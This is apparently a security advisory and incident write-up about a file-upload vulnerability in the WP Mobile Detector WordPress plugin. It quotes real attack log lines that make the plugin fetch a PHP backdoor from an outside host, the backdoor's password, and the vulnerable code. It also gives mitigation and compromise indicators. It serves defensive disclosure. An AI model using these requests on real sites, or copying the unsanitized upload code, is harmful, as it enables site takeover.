WP Mobile Detector, a WordPress plugin, contains a vulnerability in versions prior to 3.6. Exploitation of this vulnerability could allow an attacker to take control of an affected website.

US-CERT encourages users and administrators to review the WP Mobile Detector Changelog for more information and apply the necessary update.

This product is provided subject to this Notification and this Privacy & Use policy.

The vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL.

This is one of the payloads we are actively seeing in the wild:

188.73.152.166 - - [31/May/2016:23:54:43 -0400] "POST /wp-content/plugins/wp-mobile-detector/resize.php
Payload:src=hxxp://copia[.]ru/mig/tmp/css.php"

The example above uploads the css.php to the cache directory inside the plugin folder. After the upload is completed, the attackers try to access the backdoor:

46.182.30.164 - - [02/Jun/2016:14:25:01 -0400] "POST /wp-content/plugins/wp-mobile-detector/cache/css.php HTTP/1.1"

Payload: pass=dinamit

Using the backdoor password “dinamit”. As far as the vulnerability, the insecure function is inside resize.php at this part of the code:

if (isset($_REQUEST['src'])) {
 $path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);
 if(file_exists($path)){
 ...skipped…
 }else{
 file_put_contents($path, file_get_contents($_REQUEST['src']));
 ...skipped…
 }
 ...skipped…

As you can see, it’s a simple vulnerability that stems from failing to validate and sanitize input from untrusted sources. No security checks are performed and an attacker can feed the src variable with a malicious URL that contains a PHP code.

Unfortunately, at the moment of the release of this post, no updates are available and the plugin has been removed from the repository. We highly recommend everyone to remove this plugin for now. If you really need this plugin, the partial temporary fix will be to disable PHP execution in the wp-mobile-detector/cache subdirectory, for example using this code in the .htaccess file.

<Files *.php>
deny from all
</Files>

Please note that this fix will only save you from executing malware on your server. Hackers will still be able to upload files to the cache subdirectory and use links to them in attacks to third-party sites (iframes, scripts, malicious downloads) or just to host spammy/illegal content. You can also revoke write permissions in the cache subdirectory altogether, but it may break  the plugin functionality.

At this moment the majority of the vulnerable sites are infected with the porn spam doorways. You can usually find the gopni3g directory in the site root, that contains story.php (doorway generator script), .htaccess and subdirectories with spammy files and templates. The doorways redirect visitors to hxxp://bipaoeity[.]in/for/77?d=.